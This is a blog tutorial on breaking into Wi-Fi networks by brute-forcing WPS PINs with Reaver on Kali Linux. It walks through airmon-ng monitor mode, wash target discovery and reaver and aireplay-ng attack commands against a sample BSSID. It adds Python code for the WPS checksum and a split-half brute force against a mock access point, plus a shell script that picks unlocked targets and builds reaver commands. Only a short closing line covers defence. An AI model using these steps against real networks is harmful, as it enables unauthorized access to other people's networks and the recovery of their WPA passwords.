Hacking Wifi with Kali and Reaver

Attacking WPS vulnerability of some routers

Posted by Adones Pitogo on Mar 3, 2016

WPS (Wi-Fi Protected Setup) PIN authentication is a well-known weakness in many consumer routers. A short excerpt from the reaver-wps wiki describing the attack:

Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values. The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum. Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts.
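To make that key-space arithmetic concrete, here is an added example (it is not code from the reaver wiki or from this post) that implements the WPS PIN checksum digit as defined in the WPS specification and runs a Reaver-style split-half search against a mock access point. The mock AP, its PIN values and the attempt counter are constructed for illustration; a real AP answers M4 with M5 (first half correct) or a NACK, and M6 with M7 (second half correct).

```python
"""Added example: WPS PIN checksum and split-half brute force against a mock AP."""


def wps_pin_checksum(first_seven: int) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN prefix.

    Weighted-sum check from the WPS specification: counting from the right,
    odd-position digits are weighted 3, even-position digits 1, and the
    checksum digit makes the total a multiple of 10.
    """
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


class MockAccessPoint:
    """Constructed model of an AP that validates the two PIN halves separately.

    It only counts attempts; it does not model WPS rate limiting or lockout.
    """

    def __init__(self, pin: str):
        assert is_valid_wps_pin(pin), "mock AP needs a checksum-valid PIN"
        self._first, self._second = pin[:4], pin[4:]
        self.attempts = 0

    def check_first_half(self, half: str) -> bool:
        # Equivalent of the AP answering M4 with M5 (True) or a NACK (False).
        self.attempts += 1
        return half == self._first

    def check_second_half(self, first: str, half: str) -> bool:
        # Equivalent of the AP answering M6 with M7 (True) or a NACK (False).
        self.attempts += 1
        return first == self._first and half == self._second


def brute_force_pin(ap: MockAccessPoint):
    """Reaver-style search: exhaust the first half, then the second half.

    Returns the recovered 8-digit PIN, or None if the AP never accepts one.
    """
    first = None
    for i in range(10_000):
        cand = f"{i:04d}"
        if ap.check_first_half(cand):
            first = cand
            break
    if first is None:
        return None
    # Only 1000 candidates remain: three free digits plus a checksum digit
    # computed from the seven digits now known.
    for j in range(1_000):
        seven_digits = int(first + f"{j:03d}")
        cand = f"{j:03d}{wps_pin_checksum(seven_digits)}"
        if ap.check_second_half(first, cand):
            return first + cand
    return None


if __name__ == "__main__":
    # 99999995 is the last checksum-valid PIN in the search order, so this is
    # the worst case: 10,000 + 1,000 = 11,000 attempts.
    ap = MockAccessPoint("99999995")  # constructed PIN
    found = brute_force_pin(ap)
    print(f"recovered PIN {found} after {ap.attempts} attempts")
```

Run it to see the worst case land exactly on 11,000 attempts; a PIN such as 12345670 (a common default) falls out after 1,803. The point of the example is the second loop: once the first four digits are known, the checksum function leaves only 1,000 possibilities for the remaining four, which is why the second half costs so little.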

Let’s start!

Enable wireless card monitor mode

First, we need a wireless card capable of packet injection. To determine whether your card can inject, follow the injection test tutorial on Aircrack-ng's website; it is out of scope for this tutorial.

Assuming you have a capable card, let's switch it from managed to monitor mode. First kill the processes that can interfere with monitor mode (NetworkManager, wpa_supplicant and the like):

# airmon-ng check kill

Enable monitor mode:

# airmon-ng start wlan0

If you don't know which interface your wireless card is, run iwconfig, ifconfig or ip addr show. In iwconfig output, wireless interfaces show an IEEE 802.11 line (for example IEEE 802.11bgn). Your wireless card will probably be named wlan0 or something similar.

Airmon will create a new interface called wlan0mon, which is your wlan0 in monitor mode.

Find a vulnerable AP (access point/router)

We will use the wash command to find access points with WPS enabled.

# wash -i wlan0mon

If you encounter the [!] Found packet with bad FCS, skipping... error, try:

# wash -i wlan0mon --ignore-fcs

Wash then lists the APs that advertise WPS. If the WPS Locked column reads No, the AP is still accepting PIN attempts and is a candidate target. An AP that shows Yes has locked WPS (usually after too many failed attempts) and will reject further PINs until it unlocks, so leave it alone.

Select your target AP and take note of its BSSID and Channel.

Launch the attack

Now that we have the BSSID and channel of our target AP, we can launch the attack with reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv:

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv

where -a tells reaver to automatically adjust its advanced options based on the target's behaviour, and -vv turns up the verbosity. Check reaver --help for more options.

Some wireless cards, like the Alfa AWUS036NH I used, run into an association error. You can work around this by opening another terminal and doing the association yourself with aireplay-ng's fake authentication:

# aireplay-ng -1 0 -a <BSSID> <interface>

Then add the -A argument to your reaver command, which tells reaver not to associate on its own because the association is being handled by the separate aireplay-ng process:

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A
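The steps above, from wash output to the reaver command line, as an added shell example that is not part of the original post. It parses a constructed wash table (the column order BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID is assumed; the BSSIDs and ESSIDs are made up), keeps only the APs whose WPS Locked column is No, and prints the reaver command for each, with a second variant for the aireplay-ng association workaround. It only prints the commands; nothing here touches a wireless interface.

```bash
#!/bin/sh
# Added example: pick unlocked WPS targets out of wash output and build the
# reaver command. SAMPLE_WASH is a constructed table in the assumed wash
# column order; the addresses and network names are invented.
SAMPLE_WASH='BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
C0:C1:C0:E7:D1:81      11            -52        1.0               No                HomeNet
00:11:22:33:44:55      6             -70        1.0               Yes               Locked AP
AA:BB:CC:DD:EE:FF      1             -61        1.0               No                Coffee Shop Wifi'

# Read a wash table on stdin and print "BSSID channel" for every AP whose
# WPS Locked column is No. The header and separator rows are skipped; the
# ESSID is the last column and may contain spaces, so only the fixed leading
# columns ($1, $2, $5) are used.
unlocked_targets() {
    awk 'NR > 2 && $5 == "No" { print $1, $2 }'
}

# Reaver command for one target: reaver_cmd BSSID CHANNEL [INTERFACE]
reaver_cmd() {
    printf 'reaver -i %s -b %s -c %s -a -vv\n' "${3:-wlan0mon}" "$1" "$2"
}

# Same, for cards that fail to associate: fake-auth with aireplay-ng in a
# separate process and tell reaver (-A) not to associate itself.
reaver_cmd_ext_assoc() {
    printf 'aireplay-ng -1 0 -a %s %s\n' "$1" "${3:-wlan0mon}"
    printf 'reaver -i %s -b %s -c %s -a -vv -A\n' "${3:-wlan0mon}" "$1" "$2"
}

# Dry run: list the candidate targets and the command that would be used.
printf '%s\n' "$SAMPLE_WASH" | unlocked_targets | while read -r bssid chan; do
    echo "# target $bssid on channel $chan"
    reaver_cmd "$bssid" "$chan"
done
```

In real use replace the sample with `wash -i wlan0mon` output saved to a file, and pick one target rather than looping: reaver needs the card parked on a single channel, so run one attack per interface at a time.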

Another thing to look out for is getting M5 right away and then a timeout error when sending the M6 message. It might be that the target AP has WPS enabled but not configured. Don't waste your time on this AP; I've tried it and reaver will never get the PIN. See the discussion here.

If you're receiving NACK messages, the AP is responding to WPS requests as expected: a NACK after M4 simply means the PIN half you just tried was wrong, which is the normal reply for almost every attempt during the brute force.

Patience is a virtue

It will take around 10 hours, or even days, for reaver to crack the PIN, depending on signal strength and on how aggressively the AP throttles WPS attempts. The good thing is that reaver saves its progress in a session file, so you can pause it (Ctrl+C) and resume the attack at another time. You can leave reaver running overnight if you wish.

Once Reaver has cracked the PIN, it prints the AP's WPA PSK. You can now connect to the network and continue the assessment from inside it.

Youtube Demo

To prevent this kind of attack, disable WPS on your routers, or don't use routers with WPS at all. After disabling it, confirm with wash that the AP no longer advertises WPS: some router firmware keeps answering WPS PIN exchanges even after the option has been switched off in the web interface.
